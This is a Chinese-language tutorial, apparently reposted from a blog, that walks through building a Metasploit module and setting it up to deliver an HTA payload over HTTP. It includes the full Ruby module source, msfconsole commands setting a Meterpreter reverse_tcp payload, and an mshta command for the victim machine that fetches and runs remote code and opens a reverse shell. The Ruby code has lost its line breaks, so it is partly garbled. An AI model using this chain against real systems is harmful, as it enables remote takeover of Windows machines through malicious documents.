复制以下ruby代码到/usr/share/metasploit-framework/modules/exploits/windows/smb/msh_shell.rb目录(要注意代码缩进哦):
### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Office Payload Delivery', 'Description' => %q{ This module generates an command to place within a word document, that when executed, will retrieve a HTA payload via HTTP from an web server. Currently have not figured out how to generate a doc. }, 'License' => MSF_LICENSE, 'Arch' => ARCH_X86, 'Platform' => 'win', 'Targets' => [ ['Automatic', {} ], ], 'DefaultTarget' => 0, )) end def on_request_uri(cli, _request) print_status("Delivering payload") p = regenerate_payload(cli) data = Msf::Util::EXE.to_executable_fmt( framework, ARCH_X86, 'win', p.encoded, 'hta-psh', { :arch => ARCH_X86, :platform => 'win '} ) send_response(cli, data, 'Content-Type' => 'application/hta') end def primer url = get_uri print_status("Place the following DDE in an MS document:") print_line("mshta.exe "#{url}"") endend在命令行启动msf的服务:
service postgresql start再启动msf:
sudo msfconsole重新加载所有模块:
reload_all查找我们刚刚新建的msh_shell模块:
search msh_shell加载这个模块:
use exploit/windows/smb/msh_shell使用反弹shellcode, 配置本机地址, 配置uri地址
set payload windows/meterpreter/reverse_tcpset lhost 192.168.0.105set uripath aaaaexploit window系统:打开运行命令,执行:
mshta http://kali系统的IP/aaaakali系统就会收到一个window系统的shell
转载于:https://www.cnblogs.com/diligenceday/p/7906878.html